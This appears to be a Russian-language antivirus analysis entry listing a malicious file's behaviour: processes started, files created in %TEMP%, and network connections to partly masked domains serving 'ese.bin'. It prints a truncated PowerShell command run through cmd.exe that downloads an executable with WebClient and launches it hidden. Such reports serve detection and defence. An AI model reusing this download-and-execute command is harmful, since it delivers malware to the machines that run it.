Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $yknyjfd как %temp%\uwb-opy.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Hvasgcgkma([String] $yknyjfd){(New-Object System.Net.WebClient).DownloadFile($yknyjfd,''%TEMP%\Uwb-opy.exe'');Start-Process ''%TEMP%\Uwb-opy.exe'';}try{Hva...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1896
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\piss-efrx.bat
- %TEMP%\1324417.cvr
Сетевая активность
Подключается к
- 'de####fashionbd.com':80
- 'mu#####chchennai.com':80
TCP
Запросы HTTP GET
- http://de####fashionbd.com/ese.bin
- http://mu#####chchennai.com/ese.bin
UDP
- DNS ASK de####fashionbd.com
- DNS ASK mu#####chchennai.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Hvasgcgkma([String] $yknyjfd){(New-Object System.Net.WebClient).DownloadFile($yknyjfd,''%TEMP%\Uwb-opy.exe'');Start-Process ''%TEMP%\Uwb-opy.exe'';}try{Hva...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Piss-efrx.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Piss-efrx.bat" "
